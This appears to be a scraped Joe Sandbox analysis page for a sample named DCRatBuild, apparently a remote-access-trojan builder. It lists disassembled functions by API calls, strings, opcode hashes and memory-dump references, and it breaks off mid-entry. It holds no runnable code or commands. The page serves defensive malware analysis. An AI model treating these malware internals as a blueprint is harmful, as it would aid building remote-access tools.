Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
String ID: %s%s%u
API String ID: 2892007947-1360425832
Opcode ID: 82bba880f39753d972721aa1ca526eb673bbe9dadc69d43074f74263ea14b9db
Instruction ID: 77673bf022eabef222090f73b0df3c8bc9afb0a3552f10f569144fa11b3390e2
Opcode Fuzzy Hash: 82bba880f39753d972721aa1ca526eb673bbe9dadc69d43074f74263ea14b9db
Instruction Fuzzy Hash: 974111B1D0065CAADF26DBA5CC45EEA37BCFF09305F0080A6E509E60A0E7709BC4CB51

Function 008E8E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 008E8F38
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 008E8F59

Strings

<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 008E8EB2
<html>, xrefs: 008E8EA7, 008E8EE0
</html>, xrefs: 008E8F0A
utf-8"></head>, xrefs: 008E8EBD

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 3286310052-4209811716
Opcode ID: 4968ab337847be023f699b5a29289a29fe69a544b97921e5bde8dfe2efac2244
Instruction ID: 8448fd347965fb8be0fac29e5f8c4e9596f47e351b30391ff9053e101631fe9f
Opcode Fuzzy Hash: 4968ab337847be023f699b5a29289a29fe69a544b97921e5bde8dfe2efac2244
Instruction Fuzzy Hash: 64314A31508355BFD711AB399C02FBF7798FF86720F000119F905E61D1EF649A0883A2

Function 008E9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 008E964E
GetWindowRect.USER32(?,00000000), ref: 008E9693
ShowWindow.USER32(?,00000005,00000000), ref: 008E972A
SetWindowTextW.USER32(?,00000000), ref: 008E9732
ShowWindow.USER32(00000000,00000005), ref: 008E9748

Strings

RarHtmlClassName, xrefs: 008E96F4

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Window$Show$RectText
String ID: RarHtmlClassName
API String ID: 3937224194-1658105358
Opcode ID: b8f211fb0a6475a0e2ac38ba5a78bb8da82f158224f41b9b23339db196c53545
Instruction ID: 8b6c6fce5ddcde2e212b1e4e1ebf1253b4be1c4efe85e9c37b249a4622ad9012
Opcode Fuzzy Hash: b8f211fb0a6475a0e2ac38ba5a78bb8da82f158224f41b9b23339db196c53545
Instruction Fuzzy Hash: 9131E131008244EFCB119FA5DD48B6B7BA8FF49301F004559FE89DA162DBB4D848DF61

Function 008FBFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 008FBF79: _free.LIBCMT ref: 008FBFA2

_free.LIBCMT ref: 008FC003

Part of subcall function 008F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?), ref: 008F84F4
Part of subcall function 008F84DE: GetLastError.KERNEL32(?,?,008FBFA7,?,00000000,?,00000000,?,008FBFCE,?,00000007,?,?,008FC3CB,?,?), ref: 008F8506

_free.LIBCMT ref: 008FC00E
_free.LIBCMT ref: 008FC019
_free.LIBCMT ref: 008FC06D
_free.LIBCMT ref: 008FC078
_free.LIBCMT ref: 008FC083
_free.LIBCMT ref: 008FC08E

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction ID: ac1b778986138efa55c76aa05c31c7e0221d98cfcfb5879c13b741e1f1e3b0d0
Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
Instruction Fuzzy Hash: 2611EA72540B0DFAD620BBB4CC06FEBB799FF04700F508855B399E6552DF65A9048A92

Function 008F20CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,008F20C1,008EFB12), ref: 008F20D8
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 008F20E6
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008F20FF
SetLastError.KERNEL32(00000000,?,008F20C1,008EFB12), ref: 008F2151

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: f8021acf1519a705bc78580ae4d55e1a9dae75224471aa0b7ee084b3e6eddd36
Instruction ID: a0e6e4e81b13528c7b3661c2187064be2a143c0a07f185d4bb8c76289f042047
Opcode Fuzzy Hash: f8021acf1519a705bc78580ae4d55e1a9dae75224471aa0b7ee084b3e6eddd36
Instruction Fuzzy Hash: 0F01D43321D31DAEE7642BB9BC8553A3A58FB217787210B29F310D51E0EF125C55A148

Function 008EDC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

Strings

ReleaseSRWLockExclusive, xrefs: 008EDCD9
KERNEL32.DLL, xrefs: 008EDCB4
AcquireSRWLockExclusive, xrefs: 008EDCC9

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID:
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 0-1718035505
Opcode ID: b9873f42f352d0601b57c6be406d7fff8c57361e5dca5ec2fdddba49f01c91de
Instruction ID: 69305c8e2b875956ee930ebefc7cb327b54e240fb2d59255455c8eda47cbb830
Opcode Fuzzy Hash: b9873f42f352d0601b57c6be406d7fff8c57361e5dca5ec2fdddba49f01c91de
Instruction Fuzzy Hash: 2B012D327563626F8F205F765C952E72398FB83396330523AE581D3350DA91C84EEAA0

Function 008E0CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0D0D

Part of subcall function 008DACF5: GetVersionExW.KERNEL32(?), ref: 008DAD1A

LocalFileTimeToFileTime.KERNEL32(?,008E0CB8), ref: 008E0D31
FileTimeToSystemTime.KERNEL32(?,?), ref: 008E0D47
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 008E0D56
SystemTimeToFileTime.KERNEL32(?,008E0CB8), ref: 008E0D64
SystemTimeToFileTime.KERNEL32(?,?), ref: 008E0D72

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 71707c8094a0449fe3be2b1968e72e07b7355ea61185d1fd1b2697d3edb1b4f4
Instruction ID: f5f6e8fc06b1c7296be7ef694ce6c5915b561d1dedd70d0c0eb267c823fb9291
Opcode Fuzzy Hash: 71707c8094a0449fe3be2b1968e72e07b7355ea61185d1fd1b2697d3edb1b4f4
Instruction Fuzzy Hash: C831F57A91424EAECB00DFE5C8859EEBBBCFF58300B04451AE955E3210E730AA85CB65

Function 008E91B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 008E91D4
_memcmp.LIBVCRUNTIME ref: 008E91EB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 48ead57e3c16e18796d71191b493d26b79eb34665f9f13eecadbc2be639bda5b
Instruction ID: 7d1b2eb319213269b8e3628bebd1b0f7742eb02f6a37c77cfb1e5ddaa5fe042e
Opcode Fuzzy Hash: 48ead57e3c16e18796d71191b493d26b79eb34665f9f13eecadbc2be639bda5b
Instruction Fuzzy Hash: E021E27260424EBBDB049F16CC81E7B77ADFB92788B148128FD49DB242E2B0ED418791

Function 008F8FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,00910EE8,008F3E14,00910EE8,?,?,008F3713,00000050,?,00910EE8,00000200), ref: 008F8FA9
_free.LIBCMT ref: 008F8FDC
_free.LIBCMT ref: 008F9004
SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F9011
SetLastError.KERNEL32(00000000,?,00910EE8,00000200), ref: 008F901D
_abort.LIBCMT ref: 008F9023

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a278ab4abd7a631537f93aa88263cc3918c867d790c6b4aeb68e79c915b55f2e
Instruction ID: e6b365ae3cff96732701870fc9a42749e9bf0353d308cb244811108cb4419b93
Opcode Fuzzy Hash: a278ab4abd7a631537f93aa88263cc3918c867d790c6b4aeb68e79c915b55f2e
Instruction Fuzzy Hash: 91F0C836509A09FFC711333D6C0AB3B296AFFD5774F350114F715D2192EE21C9026916

Function 008ED2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 008ED2F2
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008ED30C
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008ED31D
TranslateMessage.USER32(?), ref: 008ED327
DispatchMessageW.USER32(?), ref: 008ED331
WaitForSingleObject.KERNEL32(?,0000000A), ref: 008ED33C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 635b3e8b332a4d501ea51defeb08b27359e00f1eb2179da5eb5b8301c499e1eb
Instruction ID: 353b18ab58fb4f555d56cc7776e6d661ffec0d7a27f4073bd76283a45e0f7288
Opcode Fuzzy Hash: 635b3e8b332a4d501ea51defeb08b27359e00f1eb2179da5eb5b8301c499e1eb
Instruction Fuzzy Hash: 57F03C72A05219ABCB205BA2DC4CEDBBF7DEF52391F008012F606D2110E6348545DBA1

Function 008EC40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

_wcschr.LIBVCRUNTIME ref: 008EC435

Part of subcall function 008E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,008DBB05,00000000,.exe,?,?,00000800,?,?,008E85DF,?), ref: 008E17C2

Strings

MIN, xrefs: 008EC4A3
MAX, xrefs: 008EC487
HIDE, xrefs: 008EC474
<, xrefs: 008EC41E

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 7ee6067067c972680d51f26a1c7f944a5ee8d590f0b854ad76462b743b95c33f
Instruction ID: 07866468dea42ffa739af1403d17243dc765afd1ae65092561657584e1047ff8
Opcode Fuzzy Hash: 7ee6067067c972680d51f26a1c7f944a5ee8d590f0b854ad76462b743b95c33f
Instruction Fuzzy Hash: 9231A372D0028DAADF25DA5ACC45EEB77BDFB56704F004066FA05D6090EBB09FC5CA51

Function 008EADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 008EADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 008EAE22
DeleteObject.GDI32(00000000), ref: 008EAE54
DeleteObject.GDI32(00000000), ref: 008EAE77

Part of subcall function 008E9E1C: FindResourceW.KERNEL32(008EAE4D,PNG,?,?,?,008EAE4D,00000066), ref: 008E9E2E
Part of subcall function 008E9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,008EAE4D,00000066), ref: 008E9E46
Part of subcall function 008E9E1C: LoadResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E59
Part of subcall function 008E9E1C: LockResource.KERNEL32(00000000,?,?,?,008EAE4D,00000066), ref: 008E9E64

Strings

], xrefs: 008EAE2A

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: f9161e2d6e017c6a378e3463e1efaba2d906c68114bbe559cd31efce52ff0cf5
Instruction ID: 08ae4db1a8dff3297cf6bd8d563650e1c0fc0c4cf3787a70a26a255cca5197a0
Opcode Fuzzy Hash: f9161e2d6e017c6a378e3463e1efaba2d906c68114bbe559cd31efce52ff0cf5
Instruction Fuzzy Hash: 3C0126365402A6A7C710676A9C06ABF7B79FB83F41F080010FD40E7291DFB28C159AB2

Function 008ECC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 008D130B: GetDlgItem.USER32(00000000,00003021), ref: 008D134F
Part of subcall function 008D130B: SetWindowTextW.USER32(00000000,009035B4), ref: 008D1365

EndDialog.USER32(?,00000001), ref: 008ECCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 008ECCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 008ECD05
SetDlgItemTextW.USER32(?,00000068), ref: 008ECD14

Strings

RENAMEDLG, xrefs: 008ECCA8

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 0b223bebbcabfb5c79c9b12a29da044708d7d51da67f439e996f48705de05090
Instruction ID: e6729f443fa05ae22e54cc8b12d00f456dbd2892968129e83e4004ad2c285604
Opcode Fuzzy Hash: 0b223bebbcabfb5c79c9b12a29da044708d7d51da67f439e996f48705de05090
Instruction Fuzzy Hash: D7012832B9C3547ED5218FA59D08FA73BACFB5B742F200411F385E21E0C66299069B65

Function 008F75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008F7573,00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002), ref: 008F75E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008F75F5
FreeLibrary.KERNEL32(00000000,?,?,?,008F7573,00000000,?,008F7513,00000000,0090BAD8,0000000C,008F766A,00000000,00000002), ref: 008F7618

Strings

CorExitProcess, xrefs: 008F75ED
mscoree.dll, xrefs: 008F75DB

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 39f79ef515af24b46ba29c50aa517de0aca009e39533f5fca50ae79d4d96de90
Instruction ID: 0f95ef8dbbc972aee2656fc40822c31429dd2874bc470f0d3fe1147e978ef392
Opcode Fuzzy Hash: 39f79ef515af24b46ba29c50aa517de0aca009e39533f5fca50ae79d4d96de90
Instruction Fuzzy Hash: 07F0A43161D51CBFDB159BA4DC09BAEBFB8EF04715F008158F905E2150DB348E40DA50

Function 008DEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 008E00A0
Part of subcall function 008E0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,008DEB86,Crypt32.dll,00000000,008DEC0A,?,?,008DEBEC,?,?,?), ref: 008E00C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 008DEB92
GetProcAddress.KERNEL32(009181C0,CryptUnprotectMemory), ref: 008DEBA2

Strings

CryptProtectMemory, xrefs: 008DEB8C
CryptUnprotectMemory, xrefs: 008DEB98
Crypt32.dll, xrefs: 008DEB7C

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 9e34683ce067c99f57bda90ecf66c29be1ec5db4282596cfc32f86a99fdaace4
Instruction ID: 2eb8373f728c1b7b8b94cf2ea73685877a80677e0b5e19c8e69ec0f3592a605a
Opcode Fuzzy Hash: 9e34683ce067c99f57bda90ecf66c29be1ec5db4282596cfc32f86a99fdaace4
Instruction Fuzzy Hash: 64E04F71415741DEDB309F399808B42BFE8AB14718F00C91EE4E6E3280D6F4D5809B60

Function 008F7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 008F7E4B
_free.LIBCMT ref: 008F7E6B

Memory Dump Source

Source File: 00000002.00000002.1714372499.00000000008D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000002.00000002.1714348348.00000000008D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714860267.0000000000903000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.000000000090E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000914000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1714919050.0000000000931000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000002.00000002.1715012092.0000000000932000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8d0000_DCRatBuild.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 9b6fcc5167bee92ed90a7b89f42f6116921aa0cc6dda50fc3cb9f561351d96d6
